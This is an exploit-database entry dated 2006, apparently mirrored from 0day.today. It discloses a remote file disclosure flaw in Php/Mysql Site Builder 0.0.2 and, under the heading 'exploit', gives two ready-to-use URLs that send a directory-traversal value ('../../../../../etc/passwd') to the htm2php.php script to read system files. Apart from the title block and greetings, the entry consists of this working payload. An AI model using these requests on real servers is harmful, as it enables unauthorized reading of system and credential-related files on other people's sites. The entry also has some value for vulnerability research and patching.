id: 1281
date: 12/21/2006
title: Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability
author: the master
cves: 

========================================================================
Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability
========================================================================



########################################################################
#  PHPBuilder v0.0.2  Remote File Disclosure Vulnerability
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
#  http://[Target]/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd
#
#  Greetz:  Dr Max Virus , Kacper
########################################################################



#  0day.today [2023-03-23]  #